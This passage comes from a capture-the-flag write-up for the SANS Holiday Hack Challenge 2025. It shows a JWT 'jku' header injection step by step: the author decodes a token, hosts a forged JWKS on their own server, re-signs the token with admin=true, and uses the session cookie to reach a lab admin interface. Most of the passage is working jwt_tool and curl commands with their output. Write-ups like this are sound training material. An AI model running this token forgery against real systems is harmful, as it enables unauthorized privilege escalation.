</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">html</span> <span style="color:#a6e22e">lang</span><span style="color:#f92672">=</span><span style="color:#e6db74">en</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">title</span>&gt;Redirecting...&lt;/<span style="color:#f92672">title</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">h1</span>&gt;Redirecting...&lt;/<span style="color:#f92672">h1</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">p</span>&gt;You should be redirected automatically to the target URL: &lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://gnome-48371.atnascorp/auth?token=eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQxMTM4MSwiZXhwIjoxNzY0NDE4NTgxLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.PZ7wPV0dM4W35hakhc2elX6NaSXKCRflU0C4vWwOd1p9qaynIafm-AP4zteoIOciXB82aFPmbNYolG6Od13y4nn9NT-nypRtj2NjFsMf53OFcGRd_MjK5rFhtClDRHk0mtTrPNhsdAdJnv2IXj-g6KkVrEmU8A1qRPvrHNqabzRP6gfuqz__hWv71CKHnI1IzOJ6RNJnzRNirir2xVsUqXSKPw4T1K3vmvsVUBM3o1EZjZm2OTIh3wb7t1XFVkg62O3BBEoypIyziE9-hZeHqO9YgYfjtrB-o2qNGSk64tBJwxWCEySoT9FjvFasoUKIGneVP6pkHSkhMFKCvaxXyQ&#34;</span>&gt;http://gnome-48371.atnascorp/auth?token=eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQxMTM4MSwiZXhwIjoxNzY0NDE4NTgxLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.PZ7wPV0dM4W35hakhc2elX6NaSXKCRflU0C4vWwOd1p9qaynIafm-AP4zteoIOciXB82aFPmbNYolG6Od13y4nn9NT-nypRtj2NjFsMf53OFcGRd_MjK5rFhtClDRHk0mtTrPNhsdAdJnv2IXj-g6KkVrEmU8A1qRPvrHNqabzRP6gfuqz__hWv71CKHnI1IzOJ6RNJnzRNirir2xVsUqXSKPw4T1K3vmvsVUBM3o1EZjZm2OTIh3wb7t1XFVkg62O3BBEoypIyziE9-hZeHqO9YgYfjtrB-o2qNGSk64tBJwxWCEySoT9FjvFasoUKIGneVP6pkHSkhMFKCvaxXyQ&lt;/<span style="color:#f92672">a</span>&gt;. If not, click the link</span></span></code></pre></div>
<h4 id="decoding-token">Decoding token</h4>
<p>This time around decoding the token, I used the <code>jwt_tool</code> utility. This mostly for getting the hang of this tool:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>jwt_tool.py <span style="color:#e6db74">&#39;eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQxMTM4MSwiZXhwIjoxNzY0NDE4NTgxLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.PZ7wPV0dM4W35hakhc2elX6NaSXKCRflU0C4vWwOd1p9qaynIafm-AP4zteoIOciXB82aFPmbNYolG6Od13y4nn9NT-nypRtj2NjFsMf53OFcGRd_MjK5rFhtClDRHk0mtTrPNhsdAdJnv2IXj-g6KkVrEmU8A1qRPvrHNqabzRP6gfuqz__hWv71CKHnI1IzOJ6RNJnzRNirir2xVsUqXSKPw4T1K3vmvsVUBM3o1EZjZm2OTIh3wb7t1XFVkg62O3BBEoypIyziE9-hZeHqO9YgYfjtrB-o2qNGSk64tBJwxWCEySoT9FjvFasoUKIGneVP6pkHSkhMFKCvaxXyQ&#39;</span></span></span></code></pre></div>
<p><a href="#R-image-3164029803b4cd4f49805928fa6ca806" class="lightbox-link"><img alt="Decoding token" class="lazy lightbox figure-image" loading="lazy" src="/images/act2/act2-rogue-gnome-4.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-3164029803b4cd4f49805928fa6ca806"><img alt="Decoding token" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act2/act2-rogue-gnome-4.png"></a></p>
<p>There are a few things we must be aware of here:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0"><code>[+] alg = &#34;RS256&#34;
[+] jku = &#34;http://idp.atnascorp/.well-known/jwks.json&#34;
[+] kid = &#34;idp-key-2025&#34;
[+] typ = &#34;JWT&#34;</code></pre></div>
<p>Roughly the abbreviations here translates into:</p>
<table>
  <thead>
      <tr>
          <th>Abbreviation</th>
          <th>Meaning</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><strong>alg</strong></td>
          <td>Algorithm used to sign the JWT (e.g., RS256, HS256).</td>
      </tr>
      <tr>
          <td><strong>jku</strong></td>
          <td>JSON Web Key URL - points to a JWKS endpoint containing public keys for verifying the token.</td>
      </tr>
      <tr>
          <td><strong>kid</strong></td>
          <td>Key ID - identifies which key inside the JWKS was used to sign the token.</td>
      </tr>
      <tr>
          <td><strong>typ</strong></td>
          <td>Type - indicates the token type (usually &ldquo;JWT&rdquo;).</td>
      </tr>
  </tbody>
</table>
<h4 id="inspecting-jwksjson">Inspecting jwks.json</h4>
<p>Obtaining the <code>jwks.json</code> file referenced in the JSON Web Key URL (jku) part:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl http://idp.atnascorp/.well-known/jwks.json</span></span></code></pre></div>
<p>As we can see it gives some interesting information:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;keys&#34;</span>: [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;e&#34;</span>: <span style="color:#e6db74">&#34;AQAB&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;kid&#34;</span>: <span style="color:#e6db74">&#34;idp-key-2025&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;kty&#34;</span>: <span style="color:#e6db74">&#34;RSA&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;n&#34;</span>: <span style="color:#e6db74">&#34;7WWfvxwIZ44wIZqPFP9EEemmwMhKgBakYPx736W5gGD8YJlmMzanxdi8NANJ6kyMN-ErFOKJuIQn01PmAeq7On4OCwLyQpB5dHXiidZPRjb2lbrrL1k32svdeo6VGCnzdrGu6KtDHxHn8m9H3WqGVmi2OmCZsk6fJbnoklnJaFiygUkC4IMbk92cbYvajPTqV9C6yWCROPagxQFmybq1hNJoY-FRntEKwBN89Dow8d-PsGMten3CmzDQ9o8rXKs6euk9xLfX06og5Wm1aKJk686WzhtqgdmBjqt2w34EJGlEL0ZSvPdB9nPqxao83N-ah-IYeoiCnSUBKjXI-IRSjQ&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;use&#34;</span>: <span style="color:#e6db74">&#34;sig&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}</span></span></code></pre></div>
<p>The various keys in the JSON translates to:</p>
<table>
  <thead>
      <tr>
          <th>Abbreviation / Field</th>
          <th>Meaning</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><strong>e</strong></td>
          <td>RSA public exponent, base64url-encoded. For almost all RSA keys, <code>AQAB</code> decodes to 65537 — the standard exponent.</td>
      </tr>
      <tr>
          <td><strong>kid</strong></td>
          <td>Key ID. Identifies this specific key so JWT headers can reference it. Used for key rotation.</td>
      </tr>
      <tr>
          <td><strong>kty</strong></td>
          <td>Key type. Here it is <code>&quot;RSA&quot;</code>, meaning the key uses the RSA algorithm family.</td>
      </tr>
      <tr>
          <td><strong>n</strong></td>
          <td>RSA public modulus, base64url-encoded. This is the large number that forms part of the RSA public key.</td>
      </tr>
      <tr>
          <td><strong>use</strong></td>
          <td>Intended key usage. <code>&quot;sig&quot;</code> means this key is to be used for <strong>digital signature verification</strong>.</td>
      </tr>
  </tbody>
</table>
<h4 id="attacking-jwt">Attacking JWT</h4>
<p>From looking at the <code>http://idp.atnascorp/.well-known/jwks.json</code> file I see that the server is using this to validate the tokens. My plan is to fool the server to reach out to my variant, and see if I can fool my way in!</p>
<p>From the <code>notes</code> file I can see we are hosting <code>CyberChef</code> from the local <code>www</code> folder. I can abuse that to host my poisonous jwks file from that folder.</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-markdown" data-lang="markdown"><span style="display:flex;"><span><span style="color:#75715e">## My CyberChef website:
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>curl http://paulweb.neighborhood/
</span></span><span style="display:flex;"><span><span style="color:#75715e">### My CyberChef site html files:
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>~/www/</span></span></code></pre></div>
<p>Luckily <code>jwt_tool</code> creates a lot of interesting things in <code>~/.jwt_tool</code> folder. Amongst them a jwks file which I&rsquo;ll use for my attack. Moving it over to the <code>~/www</code> folder:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cp .jwt_tool/jwttool_custom_jwks.json www/</span></span></code></pre></div>
<p>It is crucial that <code>kid</code> is set to <code>idp-key-2025</code> as the server will lookup its own public RSA based on that name:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;keys&#34;</span>:[
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;kty&#34;</span>:<span style="color:#e6db74">&#34;RSA&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;kid&#34;</span>:<span style="color:#e6db74">&#34;idp-key-2025&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;use&#34;</span>:<span style="color:#e6db74">&#34;sig&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;e&#34;</span>:<span style="color:#e6db74">&#34;AQAB&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;n&#34;</span>:<span style="color:#e6db74">&#34;tchOVdXUg9T_HV2f9TVZeoH3G2uB243yAa6Hh7RsyeOy1tAs-OEnD1_5TWrljY-RqoSfoEjbE38rtVLp_weDfroHn8I-I9lGuAA-wDI70sOTm4tSSDuwD9VBFmXI-dFwsTN446yRJagaZP4ZgfPoreOL9bpfL_7HxPOJZ14z2ZJZaP-7hr1HSasyTkkRG3u4pylgoRUu2ZUxWhqNg1A7e1YNUrtlqagooFxGYkZBXbBXJbHdMLn-PSs3tc3pWQEQHPAYBSFHnCzyTEOFQOixh-OQq3KyL5sHKvOWUhTyO2USOmJHLYUbCEd6_DfrcR4P5EctwTlTEU1ssXONGgxHAQ&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>}</span></span></code></pre></div>
<p>This jwks file is now available on the following URL:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>http://paulweb.neighborhood/jwttool_custom_jwks.json</span></span></code></pre></div>
<p>Obtaining a new JWT token:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl -X POST --data-binary <span style="color:#e6db74">$&#39;username=gnome&amp;password=SittingOnAShelf&amp;return_uri=http%3A%2F%2Fgnome-48371.atnascorp%2Fauth&#39;</span> http://idp.atnascorp/login</span></span></code></pre></div>
<p>Token:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span><span style="color:#75715e">&lt;!doctype html&gt;</span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">html</span> <span style="color:#a6e22e">lang</span><span style="color:#f92672">=</span><span style="color:#e6db74">en</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">title</span>&gt;Redirecting...&lt;/<span style="color:#f92672">title</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">h1</span>&gt;Redirecting...&lt;/<span style="color:#f92672">h1</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">p</span>&gt;You should be redirected automatically to the target URL: &lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://gnome-48371.atnascorp/auth?token=eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQxMzUzMywiZXhwIjoxNzY0NDIwNzMzLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.Sz5xSo15RlbxT7VcP2qYUUzZBZQfqkFZ3DiIusl0Y16NMcxOHCpY5ZPedxDJeHy8lnbzG-1KncDUL9qBIRD4dUOsT_R58Oy29ynoLLiwBQ5KLK-oq4HLCpWTIQ3PBk7w2SBWqJMAcdPRNCxjygUGoAnpTcjlaHk4wtRLp2X0hGLJP7sXIv1F7cQZF4Bg780ICAaPvP_jcRFF1wxzA2sMMPImrRIoA7Y53Jzk4WrMaSVJjCPXR4OxrdzPoCLzmB7Z49pSzVYv6__6vZg2WzwDxWnMTKRijK7bgJSF65NoYNfChlLd5m00t6L5E9fRIVRGIaVtQ7fydQkwSe42pRib-g&#34;</span>&gt;http://gnome-48371.atnascorp/auth?token=eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQxMzUzMywiZXhwIjoxNzY0NDIwNzMzLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.Sz5xSo15RlbxT7VcP2qYUUzZBZQfqkFZ3DiIusl0Y16NMcxOHCpY5ZPedxDJeHy8lnbzG-1KncDUL9qBIRD4dUOsT_R58Oy29ynoLLiwBQ5KLK-oq4HLCpWTIQ3PBk7w2SBWqJMAcdPRNCxjygUGoAnpTcjlaHk4wtRLp2X0hGLJP7sXIv1F7cQZF4Bg780ICAaPvP_jcRFF1wxzA2sMMPImrRIoA7Y53Jzk4WrMaSVJjCPXR4OxrdzPoCLzmB7Z49pSzVYv6__6vZg2WzwDxWnMTKRijK7bgJSF65NoYNfChlLd5m00t6L5E9fRIVRGIaVtQ7fydQkwSe42pRib-g&lt;/<span style="color:#f92672">a</span>&gt;. If not, click the link.</span></span></code></pre></div>
<p>Creating a new JWT. Here I changed <code>admin</code> to <code>true</code>, and instruct the server to use <code>http://paulweb.neighborhood/jwttool_custom_jwks.json</code> as <code>jku</code>:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>jwt_tool.py <span style="color:#e6db74">&#39;eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQxMzUzMywiZXhwIjoxNzY0NDIwNzMzLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.Sz5xSo15RlbxT7VcP2qYUUzZBZQfqkFZ3DiIusl0Y16NMcxOHCpY5ZPedxDJeHy8lnbzG-1KncDUL9qBIRD4dUOsT_R58Oy29ynoLLiwBQ5KLK-oq4HLCpWTIQ3PBk7w2SBWqJMAcdPRNCxjygUGoAnpTcjlaHk4wtRLp2X0hGLJP7sXIv1F7cQZF4Bg780ICAaPvP_jcRFF1wxzA2sMMPImrRIoA7Y53Jzk4WrMaSVJjCPXR4OxrdzPoCLzmB7Z49pSzVYv6__6vZg2WzwDxWnMTKRijK7bgJSF65NoYNfChlLd5m00t6L5E9fRIVRGIaVtQ7fydQkwSe42pRib-g&#39;</span> -I -pc admin -pv true -X s -ju http://paulweb.neighborhood/jwttool_custom_jwks.json</span></span></code></pre></div>
<p>The same as above, but with fancy output:</p>
<p><a href="#R-image-7477dd9d7b6117a84f09134522707b5e" class="lightbox-link"><img alt="Creating a new token" class="lazy lightbox figure-image" loading="lazy" src="/images/act2/act2-rogue-gnome-5.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-7477dd9d7b6117a84f09134522707b5e"><img alt="Creating a new token" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act2/act2-rogue-gnome-5.png"></a></p>
<p>Now authenticating as admin:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl -v http://gnome-48371.atnascorp/auth?token<span style="color:#f92672">=</span>eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9wYXVsd2ViLm5laWdoYm9yaG9vZC9qd3R0b29sX2N1c3RvbV9qd2tzLmpzb24iLCJraWQiOiJpZHAta2V5LTIwMjUiLCJ0eXAiOiJKV1QifQ.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQxMzUzMywiZXhwIjoxNzY0NDIwNzMzLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6dHJ1ZX0.Dx4hBjLLBnLZZNr_kP3-5BzY4K-eN8WfhTgwGq6zOprrxSNxjS-FkNLwlAAwYdt1hxNghAh-0FXRtt-XoRha9yog4Z0z-mHivLJKymBsCCpq9jacCp6NE3C4Aom6ZQFBYoyW9PZZ-e-3r75fCpR555ydOYWlRqfYCKIwet7f1lCjshr8uI6yDNh8vp98PvNz2ZJIXy0mGY6TwrDR-sUF66q0g6FWOhM2NvUq02R5OiLWjpiUuPSH8-O9A6AYRoMyxFUJnWUXwGSCilWS9LL7ScBaasMG8QN30mFZHYHcJsuRLOfIUUZorY4TZRtzIMBYbiVlGG2bwuLNJgf7bW4dnA</span></span></code></pre></div>
<p>Success. I got a session cookie! Logging in as admin using this session cookie:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl -H <span style="color:#e6db74">&#39;Cookie: session=eyJhZG1pbiI6dHJ1ZSwidXNlcm5hbWUiOiJnbm9tZSJ9.aSrRvg.rlv7JcpRYubB-uIsJjcRjOTguuk&#39;</span> http://gnome-48371.atnascorp/diagnostic-interface</span></span></code></pre></div>
<p>And this is what I see as admin:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span><span style="color:#75715e">&lt;!DOCTYPE html&gt;</span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">html</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">head</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">title</span>&gt;AtnasCorp : Gnome Diagnostic Interface&lt;/<span style="color:#f92672">title</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">link</span> <span style="color:#a6e22e">rel</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;stylesheet&#34;</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text/css&#34;</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/static/styles/styles.css&#34;</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">head</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">body</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">h1</span>&gt;AtnasCorp : Gnome Diagnostic Interface&lt;/<span style="color:#f92672">h1</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">style</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;display:flex; justify-content:center; gap:10px;&#39;</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">img</span> <span style="color:#a6e22e">src</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;/camera-feed&#39;</span> <span style="color:#a6e22e">style</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;width:30vh; height:30vh; border:5px solid yellow; border-radius:15px; flex-shrink:0;&#39;</span> /&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">style</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;width:30vh; height:30vh; border:5px solid yellow; border-radius:15px; flex-shrink:0; display:flex; align-items:flex-start; justify-content:flex-start; text-align:left;&#39;</span>&gt;
</span></span><span style="display:flex;"><span>System Log&lt;<span style="color:#f92672">br</span>/&gt;
</span></span><span style="display:flex;"><span>2025-11-29 03:29:12: Movement detected.&lt;<span style="color:#f92672">br</span>/&gt;
</span></span><span style="display:flex;"><span>2025-11-29 08:47:43: AtnasCorp C<span style="color:#960050;background-color:#1e0010">&amp;</span>C connection restored.&lt;<span style="color:#f92672">br</span>/&gt;
</span></span><span style="display:flex;"><span>2025-11-29 10:16:00: Checking for updates.&lt;<span style="color:#f92672">br</span>/&gt;
</span></span><span style="display:flex;"><span>2025-11-29 10:16:00: Firmware Update available: refrigeration-botnet.bin&lt;<span style="color:#f92672">br</span>/&gt;
</span></span><span style="display:flex;"><span>2025-11-29 10:16:02: Firmware update downloaded.&lt;<span style="color:#f92672">br</span>/&gt;
</span></span><span style="display:flex;"><span>2025-11-29 10:16:02: Gnome will reboot to apply firmware update in one hour.&lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;statuscheck&#34;</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;status-container&#34;</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;status-item&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;status-indicator active&#34;</span>&gt;&lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">span</span>&gt;Live Camera Feed&lt;/<span style="color:#f92672">span</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;status-item&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;status-indicator active&#34;</span>&gt;&lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">span</span>&gt;Network Connection&lt;/<span style="color:#f92672">span</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;status-item&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;status-indicator active&#34;</span>&gt;&lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">span</span>&gt;Connectivity to Atnas C<span style="color:#960050;background-color:#1e0010">&amp;</span>C&lt;/<span style="color:#f92672">span</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">body</span>&gt;</span></span></code></pre></div>
<p>The malicious firmware image the gnomes are downloading is <code>refrigeration-botnet.bin</code></p>
<p>When identity is compromised, trust collapses—and everything downstream becomes a delivery mechanism.</p>
<h2 id="paul-beckett-closing-words">Paul Beckett closing words</h2>
<p>After solving, Paul says:</p>
<blockquote>
<p>Brilliant work on that privilege escalation! You&rsquo;ve successfully gained admin access to the diagnostic interface.</p>
<p>Now we finally know what updates the gnomes have been receiving - proper good pentesting skills in action!</p>
</blockquote>

  <footer class="footline">
              <i class='fa-fw fas fa-calendar'></i> Dec 23, 2025
  </footer>
</article>
        </div>
      </main>
    </div>
    <aside id="R-sidebar" class="default-animation">
      <div id="R-header-topbar" class="default-animation"></div>
      <div id="R-header-wrapper" class="default-animation">
        <div id="R-header" class="default-animation">
          <a id="R-logo" class="R-default" href="/index.html">
            <div class="logo-title">SANS Holiday Hack Challenge 2025</div>
          </a>
        </div>
      </div>
      <div id="R-homelinks" class="default-animation homelinks">
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-homelinks">
          <ul class="space collapsible-menu">
            <li class="" data-nav-url="/index.html"><a class="padding" href="/index.html"><i class="fa-fw fas fa-home"></i> Home</a></li>
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-headercontrols">
          <ul class="">
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
      </div>
      <div id="R-content-wrapper" class="highlightable">
        <div class="R-sidebarmenu R-shortcutmenu-main">
          <ul class="enlarge morespace collapsible-menu">
            <li class="parent hidden " data-nav-url="/act2/index.html"><a class="padding" href="/act2/index.html">Act 2</a><ul id="R-subsections-9d3d8c898368693a495088de36411fa6" class="collapsible-menu">
            <li class="" data-nav-url="/act2/retro-recovery/index.html"><a class="padding" href="/act2/retro-recovery/index.html">Retro Recovery</a></li>
            <li class="" data-nav-url="/act2/mail-detective/index.html"><a class="padding" href="/act2/mail-detective/index.html">Mail Detective</a></li>
            <li class="" data-nav-url="/act2/idorable-bistro/index.html"><a class="padding" href="/act2/idorable-bistro/index.html">Idorable Bistro</a></li>
